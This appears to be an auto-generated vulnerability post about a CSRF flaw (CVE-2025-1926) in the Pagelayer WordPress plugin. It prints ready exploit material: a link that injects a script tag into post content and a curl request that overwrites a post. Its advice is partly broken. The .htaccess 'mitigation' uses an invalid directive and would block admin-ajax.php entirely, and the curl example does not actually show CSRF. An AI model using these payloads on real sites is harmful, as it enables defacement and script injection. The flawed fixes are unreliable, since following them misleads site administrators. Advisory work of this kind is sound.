Listen to this Post
How CVE-2025-1926 Works
The Page Builder: Pagelayer plugin (≤ v1.9.8) fails to implement proper nonce validation in the `pagelayer_save_post` function. Attackers craft malicious requests to modify WordPress post content when an admin clicks a malicious link. Since no CSRF token (nonce) is verified, the plugin processes unauthorized changes, leading to defacement, SEO spam, or malware injection.
DailyCVE Form
Platform: WordPress
Version: ≤ 1.9.8
Vulnerability: CSRF
Severity: Medium
Date: 05/25/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation
1. Malicious Link:
<a href="http://victim-site/wp-admin/admin-ajax.php?action=pagelayer_save_post&post_id=123&content=<script>alert(1)</script>">Click Me</a>
2. CURL Exploit:
curl -X POST "http://victim-site/wp-admin/admin-ajax.php" --data "action=pagelayer_save_post&post_id=123&content=HACKED"
Protection
1. Temporary Fix:
Add nonce check in `pagelayer_save_post`:
function pagelayer_save_post() { if (!wp_verify_nonce($_REQUEST['_wpnonce'], 'pagelayer-save-post')) { wp_die('Invalid nonce'); } // Rest of the code }
2. .htaccess Mitigation:
<Files "admin-ajax.php"> Require all denied Require wp-admin </Files>
Analytics
- CVSS: 6.5 (Medium)
- Attack Vector: Network
- Privileges Required: None
- User Interaction: Required
Detection
grep -r "pagelayer_save_post" /var/www/html/wp-content/plugins/pagelayer/
Patch Verification
wp plugin update pagelayer --dry-run
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode